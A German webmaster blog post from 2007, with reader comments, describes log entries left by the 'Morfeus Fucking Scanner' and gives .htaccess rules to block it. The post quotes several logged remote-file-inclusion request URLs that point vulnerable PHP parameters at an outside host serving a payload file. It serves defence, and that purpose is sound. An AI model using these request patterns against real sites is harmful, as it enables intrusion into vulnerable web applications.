Sunday, February 25. 2007

in Für den Webmaster

Comments (4)
Trackback (1)
Defined tags for this entry: , ,
Related entries by tags:
Links der Woche #39
Links der Woche #21
sl_secret_ping_button
Links der Woche #16
Domainumzug ohne Besucher zu verlieren
Select language: English, German

Morfeus Fucking Scanner

English Version here.

Heute haben wir in den Logfiles eines unserer Kunden Hunderte Einträge eines Useragenten "Morfeus Fucking Scanner" entdeckt. Der hat zwischen 04:33 und 04:45 Uhr ca. 400 verschiedene Files versucht aufzurufen, um Sicherheitslücken oder alte (oder auch vergessene) Skripts auf dem Server zu finden.

Das scheint ein automatisches Skript zu sein, das einfach auf Verdacht Hunderte Dateinamen aufruft und guckt, ob etwas antwortet. Einige Beispiele:

/portal/index.php?file_name[]=http://203.198.68.236/~lisir/M.txt?&/
/board/naboard_pnr.php?skin=http://203.198.68.236/~lisir/M.txt?&/
/revista/estilo/discreet/index.php?adodb=http://203.198.68.236/~lisir/M.txt?&/
/components/com_performs/performs.php?mosConfig_absolute_path=http://203.198.68.236/~lisir/M.txt?&/
/redaxo/include/addons/simple_user/pages/index.inc.php?REX[INCLUDE_PATH]=http://203.198.68.236/~lisir/M.txt?&/
/jetboxincludes/phpdig/includes/config.php?relative_script_path=http://203.198.68.236/~lisir/M.txt?&/
/phpnuke/modules/vWar_Account/includes/functions_common.php?vwar_root2=http://203.198.68.236/~lisir/M.txt?&/


Die "Angriffe" kamen alle von der IP: 208.67.180.44 und wer den Useragenten aussperren will: HTTP_USER_AGENT: Morfeus Fucking Scanner

Mit diesen Zeilen in der .htaccess lässt sich der Scanner vom Server aussperren:

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^Morfeus
RewriteRule ^.*$ - [F]

Wenn dir dieser Artikel geholfen hat, dann darfst du gerne ein paar Cent in unsere Kaffeekasse spenden.



Trackbacks
Trackback specific URI for this entry

evologiq - Das Blog

03/09/2007 10:30PM

Turk Telekom aussperren
Es gibt ein recht aktives Forum mit einer Hand voll Skript Kiddies, die den ganzen Tag nichts anderes tun, als neue Skripte auszuprobieren, die mehr oder weniger automatisch Schwachstellen in PHP oder CGI Anwendungen suchen, um dort die Seiten zu "defacen

Comments
Display comments as (Linear | Threaded)

avatar

Eric

03/23/2007 11:49PM

Thanks buddy. The code you provided must go to .htaccess ?? Can you post yours here to let me validate?
Reply
#1
avatar

evologIQ

Homepage

03/24/2007 12:13AM

Sure...

ErrorDocument 404 /index.php
DirectoryIndex /index.php

RewriteEngine On
RewriteBase /

deny from all


#Morfeus Fucking Scanner aussperren
RewriteCond %{HTTP_USER_AGENT} ^Morfeus
RewriteRule ^.*$ - [F]

#Morfeus Fucking Hacker
deny from 203.198.68.236

#Turk Telekom
deny from 81.212.0.0/14
# 81.212.0.1 - 81.215.255.254
deny from 85.96.0.0/12
# 85.96.0.1 - 85.111.255.254
deny from 88.224.0.0/11
# 88.224.0.1 - 88.255.255.254

Hope that helps.
Reply
#1.1
avatar

ChPortos

Homepage

05/26/2008 09:11AM

Sorry to wake up this post, but this solution did create a 500 error on my server ... In the error logs I can see this : "[...] Invalid command 'RewriteEngine', perhaps misspelled or defined by a module not included in the server configuration, [...]"
Where did it come from ?

Thanks for your help !
Reply
#1.1.1
avatar

Markus Hess

07/03/2008 01:35PM

I removed the 'deny to all', then the access was possible again....
Reply
#1.1.1.1

Add Comment

Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
Standard emoticons like :-) and ;-) are converted to images.
E-Mail addresses will not be displayed and will only be used for E-Mail notifications
BBCode format allowed
 
 

Frontpage - Top level

Quicksearch

Permalinks

Foxit PDF Software!
Netcam Watcher
Stromspar-Suchmaschine
Blog Top Liste - by TopBlogs.de
Blogverzeichnis - Blog Verzeichnis bloggerei.de

Kommentare

Josef Willkommer about Magento Commerce
Sat, 23.08.2008 16:57
In der Zwischenzeit hat sich hier ja doch einiges getan. [...]


Jens unterm Sonnensegel about Office 2007 für 79 Euro
Mon, 28.07.2008 14:13
Ich habe mir mal die Testversion von Office 2007 angesehen, [...]


aileen about Mediaplayer auf der Taskleiste
Mon, 28.07.2008 01:52
also ähm bei mir funzt daas trotzdem ned...wenn ich bei [...]


Argun about JTL-Shop 2.1
Wed, 23.07.2008 13:13
Hi, wir setzen auch die Shopsoftware von JTL bei [...]


vmk about Office 2007 für 79 Euro
Sat, 19.07.2008 00:08
Na so der Sonderpreis ist das nicht, vergleiche doch mal die [...]


Populäre Stichworte

, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,

Letzte Google Suche

sitemap online erstellen
terra laptop
inurl:viewerframe?mode=motion
terra notebook
wie kann ich ein webserver verschlüsseln truecrypt
foxit pdf editor key
domainumzug seo
jtl shop download
legends may sleep kimble
hilfreiche vista tools
foxit pdf editor key
morfeus fucking scanner
xt:commerce template rapidshare
terra laptop
dvd verschlüsseln mit truecrypt
nurl;"viewerframe?mode=refresh"
foxit pdf editor keygen

Kategorien


All categories

Partner

Antike Kronleuchter
Beausoft New Zealand
Casino Lounge Leipzig
Cocktailbar Zeitlos
Cursorsystems
Dekolager Berlin
Foxit Software
Gastronomiemöbel
Gastronomie-Theken
Netcam Watcher
Add to Technorati Favorites

Blog abonnieren

Language/Sprache

Blogfever